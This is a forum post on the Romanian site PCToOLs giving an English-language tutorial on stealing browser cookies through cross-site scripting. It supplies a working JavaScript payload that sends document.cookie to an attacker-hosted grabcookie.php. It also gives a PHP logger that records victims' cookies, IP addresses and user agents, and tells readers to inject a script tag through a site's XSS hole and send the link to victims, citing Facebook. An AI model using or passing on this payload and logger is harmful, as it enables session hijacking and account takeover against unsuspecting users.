PCToOLs
Un forum pentru fiecare!!
|
Lista Forumurilor Pe Tematici
|
PCToOLs | Reguli | Inregistrare | Login
POZE PCTOOLS
Nu sunteti logat.
|
Nou pe simpatie:
Profil Ana Maria 25
 | Femeie
24 ani
Bucuresti
cauta Barbat
35 - 68 ani |
|
b3n1am1n
Administrator
 Inregistrat: acum 17 ani
Postari: 3407
|
|
Background: XSS is done by people putting codes into a website which runs on the webpage when a user does a specific event. Typically, people attempt to steal cookies in this manner, and this is all I’m going to show, but other things can be stolen, and some other codes could be ran through a javascript file.
Steps:
1. Create your javascript file, xss.js. An example is below. This file connects to your grabcookie.php file and includes the users cookie in the URL.
2. You obviously need your grabcookie.php file. Your grabcookie.php file is what saves the cookie. You can view the code below. This uses the GET function to retrieve to cookie from the URL. It then adds the cookie and other items together and formats them, and then adds them to a current log file, cookiejar.php. You need to create a blank file called cookiejar.php and upload it to the same directory as your other files.
3. Now how are the cookies accessed? Simple. Connect to your webpage at “http://www.site.com/cookies/cookiejar.php”. Here is where all the cookies are saved to.
4. Now you just need to find a exploit in the site to request to their .js (javascript) file, which then runs its code. A list of some exploits can be found on this site, ” ha.ckers.org web application security lab. Of course, there are many others too, but that would be a start for you. A great web page scanner for you to check out is Acunetix Web Vulnerability Scanner 4. It scans the webpage for many exploits and bugs. Scan your site and then secure the bugs to prevent any xss attacks on your site.
Files:
xss.js
Code:
var i=new Image();
i.src = " http://www.site.com/cookies/grabcookie.php?cookie="+document.cookie |
grabcookie.php
Code:
<?php
$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$data = $_GET['cookie'];
$time = date("d-m-Y G : i : s A");
$text = $time." = ".$ip."<br>User Agent:".$agent."<br>Referer: ".$referer."<br>Session: ".$data."<br><br><br>";
$handle=fopen("cookiejar.php","a");
fputs($handle,"\n".$text."\n");
$handle = $handle + "\n";
fclose($handle);
?> |
Applying it:
The document.cookie function only retrieves cookies from the CURRENT webpage. if you were to type in javascript:document.cookie to your current 7S window.. it would display your username (in # form) and password (in encoded form). If a person got their hands on this they could add your cookies and basically go on your account without knowing your password.
For security reasons (your safety not mine) I am going to show you how xss can be used. The following link manipulates facebook into adding some content of my own. SkillzBase | Facebook
Now if you were to replace that chunk of my code with lets say "><script src="PATH/TO/YOUR/XSS"></script> and sent that link to a person, then you can take their login infookie
_______________________________________
1) Esti pe net
2) Esti pe Situl MediasH
3) Imi citesti semnatura
5) Nu ai observat ca lipseste punctul 4
6) Tocmai ai verificat daca exista punctul 4 sau nu
7) Zambesti, sau chiar razi !
|
|
| pus acum 17 ani |
|